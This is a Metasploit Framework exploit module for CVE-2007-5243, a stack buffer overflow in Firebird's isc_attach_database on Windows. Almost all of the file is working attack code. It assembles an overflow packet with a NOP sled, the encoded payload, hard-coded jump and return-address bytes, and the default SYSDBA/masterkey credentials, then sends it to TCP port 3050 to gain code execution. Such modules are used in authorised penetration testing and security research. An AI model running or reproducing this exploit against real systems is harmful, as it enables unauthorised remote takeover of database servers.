rapid7/metasploit-framework

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::BruteTargets

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Firebird Relational Database isc_attach_database() Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Borland InterBase
        by sending a specially crafted create request.
      },
      'Author'    =>
        [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
      'Arch'        => ARCH_X86,
      'Platform'    => 'win',
      'References'    =>
        [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38607' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
      'Privileged'    => true,
      'License'    => MSF_LICENSE,
      'Payload'    =>
        {
          'Space' => 512,
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
          'StackAdjustment' => -3500,
        },
      'Targets'    =>
        [
          [ 'Brute Force', { } ],
          # '\Device\HarddiskVolume1\WINDOWS\system32\unicode.nls'
          [
            'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',
            { 'Length' => [ 756 ], 'Ret' => 0x00370b0b }
          ],
          # Debug
          [
            'Debug',
            { 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }
          ],
        ],
      'DefaultTarget'    => 1,
      'DisclosureDate'  => '2007-10-03'
    ))

    register_options(
      [
        Opt::RPORT(3050)
      ])
  end

  # Create database parameter block
  def dpb_create
    isc_dpb_user_name = 28
    isc_dpb_password = 29

    isc_dpb_version1 = 1

    user = 'SYSDBA'
    pass = 'masterkey'

    dpb = ''

    dpb << [isc_dpb_version1].pack('c')

    dpb << [isc_dpb_user_name].pack('c')
    dpb << [user.length].pack('c')
    dpb << user

    dpb << [isc_dpb_password].pack('c')
    dpb << [pass.length].pack('c')
    dpb << pass

    dpb
  end

  # Calculate buffer padding
  def buf_padding(length = '')
    remainder = length.remainder(4)
    padding = 0

    if remainder > 0
      padding = (4 - remainder)
    end

    padding
  end

  def exploit_target(target)

    target['Length'].each do |length|

      connect

      # Attach database
      op_attach = 19

      # Extra padding to trigger the exception
      extra_padding = 1024 * 16

      buf = ''

      # Operation/packet type
      buf << [op_attach].pack('N')

      # Id
      buf << [0].pack('N')

      # Length
      buf << [length + extra_padding].pack('N')

      # Nop block
      buf << make_nops(length - payload.encoded.length - 13)

      # Payload
      buf << payload.encoded

      # Jump back into the nop block
      buf << "\xe9" + [-516].pack('V')

      # Jump back
      buf << "\xeb" + [-7].pack('c')

      # Random alpha data
      buf << rand_text_alpha(2)

      # Target
      buf << [target.ret].pack('V')

      # Random alpha data
      buf << rand_text_alpha(extra_padding)

      # Padding
      buf << "\x00" * buf_padding(length + extra_padding)

      # Database parameter block

      # Create database parameter block
      dpb = dpb_create

      # Database parameter block length
      buf << [dpb.length].pack('N')

      # Database parameter block
      buf << dpb

      # Padding
      buf << "\x00" * buf_padding(dpb.length)

      sock.put(buf)

      select(nil,nil,nil,4)

      handler

    end

  end
end